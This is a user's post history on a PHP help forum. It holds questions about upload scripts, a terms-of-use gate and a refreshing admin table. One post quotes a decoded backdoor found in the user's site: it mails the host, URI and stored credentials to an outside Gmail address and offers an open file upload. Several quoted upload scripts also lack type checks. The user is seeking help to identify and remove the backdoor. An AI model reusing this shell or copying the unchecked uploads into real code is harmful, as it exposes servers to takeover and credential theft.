Jump to content

catherinePHP

Members
  • Posts

    9
  • Joined

  • Last visited

catherinePHP's Achievements

Newbie

Newbie (1/5)

0

Reputation

  1. Hello I have many php scripts and I want the user to agree to the terms of use before using them, I want a way to code it in which the user can never use any of the scripts without agreeing. I found some scripts online but all were not working properly because a user can directly go to the script link without going through the terms of use first. please help.
  2. Thank you that helped! It works properly but it doesn't give you the correct link. The script is programmed to rename the file after it gets uploaded. your solution outputs the name of the file before it gets renamed. how can I fix this?
  3. What should I edit to tell the script to give the uploaded file url instead of refreshing to a website? here is the code: <?php define('DESTINATION_FOLDER','C:\xampp\uploads\\'); define('MAX_FILE_SIZE', 0); define('SUCCESS_URL','http://www.example.com/upload-success.html'); $exts = array(); define('RENAME_FILE', true); define('APPEND_STRING', ''); define('DO_LOG', true); define('DB_HOST','localhost'); // host, usually localhost define('DB_DATABASE','upload'); // database name define('DB_USERNAME','root'); // username define('DB_PASSWORD',''); // password @set_time_limit(172800); function showUploadForm($message='') { $max_file_size_tag = ''; if (MAX_FILE_SIZE > 0) { // convert to bytes $max_file_size_tag = "<input name='MAX_FILE_SIZE' value='".(MAX_FILE_SIZE*1024)."' type='hidden' >\n"; } // Load form template include ('file-upload.html'); } // errors list $errors = array(); $message = ''; // we should not exceed php.ini max file size $ini_maxsize = ini_get('upload_max_filesize'); if (!is_numeric($ini_maxsize)) { if (strpos($ini_maxsize, 'M') !== false) $ini_maxsize = intval($ini_maxsize)*1024*1024; elseif (strpos($ini_maxsize, 'K') !== false) $ini_maxsize = intval($ini_maxsize)*1024; elseif (strpos($ini_maxsize, 'G') !== false) $ini_maxsize = intval($ini_maxsize)*1024*1024*1024; } if ($ini_maxsize < MAX_FILE_SIZE*1024) { $errors[] = "Alert! Maximum upload file size in php.ini (upload_max_filesize) is less than script's MAX_FILE_SIZE"; } if (!isset($_POST['submit'])) { showUploadForm(join('',$errors)); } else { while(true) { if (!@file_exists(DESTINATION_FOLDER)) { $errors[] = "Destination folder does not exist or no permissions to see it."; break; } $error_code = $_FILES['filename']['error']; if ($error_code != UPLOAD_ERR_OK) { switch($error_code) { case UPLOAD_ERR_INI_SIZE: $errors[] = "File is too big (1)."; break; case UPLOAD_ERR_FORM_SIZE: $errors[] = "File is too big (2)."; break; case UPLOAD_ERR_PARTIAL: $errors[] = "Could not upload file (1)."; break; case UPLOAD_ERR_NO_FILE: $errors[] = "Could not upload file (2)."; break; case UPLOAD_ERR_NO_TMP_DIR: $errors[] = "Could not upload file (3)."; break; case UPLOAD_ERR_CANT_WRITE: $errors[] = "Could not upload file (4)."; break; case 8: $errors[] = "Could not upload file (5)."; break; } break; } $filename = @basename($_FILES['filename']['name']); $tmp_filename = $_FILES['filename']['tmp_name']; $file_ext = @strtolower(@strrchr($filename,".")); if (@strpos($file_ext,'.') === false) { // no dot? strange $errors[] = "Suspicious file name or could not determine file extension."; break; } $file_ext = @substr($file_ext, 1); // remove dot if (count($exts)) { if (!@in_array($file_ext, $exts)) { $errors[] = "Files of this type are not allowed for upload."; break; } } $dest_filename = $filename; if (RENAME_FILE) { $dest_filename = md5(uniqid(rand(), true)) . '.' . $file_ext; } $dest_filename = $dest_filename . APPEND_STRING; $filesize = intval($_FILES["filename"]["size"]); // filesize($tmp_filename); if (MAX_FILE_SIZE > 0 && MAX_FILE_SIZE*1024 < $filesize) { $errors[] = "File is too big (3)."; break; } if (!@move_uploaded_file($tmp_filename , DESTINATION_FOLDER . $dest_filename)) { $errors[] = "Could not upload file (6)."; break; } if (DO_LOG) { $link = @mysql_connect(DB_HOST, DB_USERNAME, DB_PASSWORD); if (!$link) { $errors[] = "Could not connect to mysql."; break; } $res = @mysql_select_db(DB_DATABASE, $link); if (!$res) { $errors[] = "Could not select database."; break; } $m_ip = mysql_real_escape_string($_SERVER['REMOTE_ADDR']); $m_size = $filesize; $m_fname = mysql_real_escape_string($dest_filename); $sql = "insert into _uploads_log (log_filename,log_size,log_ip) values ('$m_fname','$m_size','$m_ip')"; $res = @mysql_query($sql); if (!$res) { $errors[] = "Could not run query."; break; } @mysql_free_result($res); @mysql_close($link); } // if (DO_LOG) header('Location: ' . SUCCESS_URL); die(); break; } // while(true) // Errors. Show upload form. $message = join('',$errors); showUploadForm($message); } ?>
  4. I don't know what's wrong with my script, when I login into a page it redirects me to the admin page normally but the admin page keeps refreshing! I've located the problem which is in my javascript but I don't know what's wrong with it. Here is the javascript code: $(document).ready(function() { (function($){ $.fn.avu = function() { $.post('backend/build_table.php', { 'session_id' : sessid }, function(data) { // login check try { JSON.parse(data); } catch (e) { location.href = './index.php'; return; } data = jQuery.parseJSON(data); var tbl = ""; $.each(data, function(id, row) { $('.tooltip').hide(); $("tbody tr").remove(); var tbl_row = ""; var hash; var name; $.each(this, function(k , v) { if(k=='hash'){hash=v;} if(k=='name'){name=v;} if(k=='filepath' || k=='results'){return;} else if(k=='size'){ tbl_row += '<td class="'+k+'">'+bytesToSize(v)+"</td>\n"; } else if(k=='scanned') { // set status if(v=='0') { v = 'In queue'; } else if(v=='1' && row['results'] == null) { v = 'Clean'; } else if(v=='1' && row['results'] != null) { v=''; var results = jQuery.parseJSON( row['results']); v+='<ul>'; $.each(results, function(kr,r) { v+='<li class="small"><span class="tt" title="Scanned with: '+r.scanner+'">'+r.result+ '</span></li>' + "\n"; }); v+='<ul>'; } tbl_row += '<td class="'+k+'">'+v+"</td>\n"; } else{ tbl_row += '<td class="'+k+'">'+v+"</td>\n"; } }) // add extra row var durl = 'download/'+hash+'/'+name; tbl_row += '<td><a href="'+durl+'" target="blank"><img src="assets/img/download.png" class="tt bdown" title="Download file" /></a>'+ '<img src="assets/img/delete.png" class="tt bdel"title="Remove file" /></td>'; tbl += '<tr id="'+row['id']+'">'+tbl_row+"</tr>\n"; }); // build $("tbody").html(tbl); $('.tt').tooltip({'delay':4}); // remove file $(".bdel").click(function() { var id= $(this).parent().parent().attr('id'); $.post("backend/delete_file.php", { id: id, 'session_id' : sessid }, function(data) { $('tr[id="'+id+'"]').remove(); $('.tooltip').hide(); //rebuild setTimeout(function() { $('tbody').avu(); }, 2000); }); }); }); }; })(jQuery); // build and refresh table $('tbody').avu(); setInterval(function() { $('tbody').avu(); }, 20000); /** * Convert number of bytes into human readable format * * @param integer bytes Number of bytes to convert * @return string */ function bytesToSize(bytes) { var sizes =['Bytes','KB','MB','GB','TB']; if(bytes==0) return 'n/a'; var i=parseInt(Math.floor(Math.log(bytes)/Math.log(1024))); return Math.round(bytes/Math.pow(1024,i),2)+' '+sizes[i]; } }); What causes the page to refresh every 2 seconds? and how can I fix this? Thanks in advance
  5. Thanks for the reply guys, I have removed it from my server and changed all passwords
  6. I found this code which was encrypted in base64 in a php script: $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Egy_Spider \nUserName: ".htmlspecialchars($tacfgd['uname']) ."\nPassWord: ".htmlspecialchars($tacfgd['pword'])."\nMessage:\n"."\nE-server: ".htmlspecialchars ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP: "; mail("bohr4u@gmail.com","Shell http://$web$inj", "$body"); echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; } else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; } } ?> I'm not sure if it's a backdoor or not, can anyone clarify please?
  7. Hello phpfreaks I found a basic php upload script which i find really useful but I have a problem, I'm new to php programming and need help in this code: <? $upload = $_GET["upload"]; if ($upload == "now") { $path1 = "uploads/"; $path="$path1".$_FILES['ufile']['name']; if($ufile !=none) { if(copy($_FILES['ufile']['tmp_name'], $path)) { echo "Success!<BR/>"; echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"2; URL=uploads/\">"; } else { echo "<font color=red><b>Error!</b></font>"; } } } else { ?> <table width="250" border="0" align="left" cellpadding="0" cellspacing="1"> <tr> <form action="?upload=now" method="post" enctype="multipart/form-data"> <td> <table border="0" cellpadding="3" cellspacing="1"> <tr> <td>Select file <input name="ufile" type="file" id="ufile" /></td> </tr> <tr> <td align="left"><input type="submit" name="Submit" value="Upload" /></td> </tr> </table> </td> </form> </tr> </table> <a href="uploads">View Uploads</a> <? } ?> I want the script to change the name of a file to random numbers after being uploaded for example: If a person uploaded a file called: "catherine.jpg" The script will automatically rename it to: "1231421421421.jpg" while providing a link to the uploaded file. How can I do that? any help would be appreciated Thanks in advance, and sorry for my bad english.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.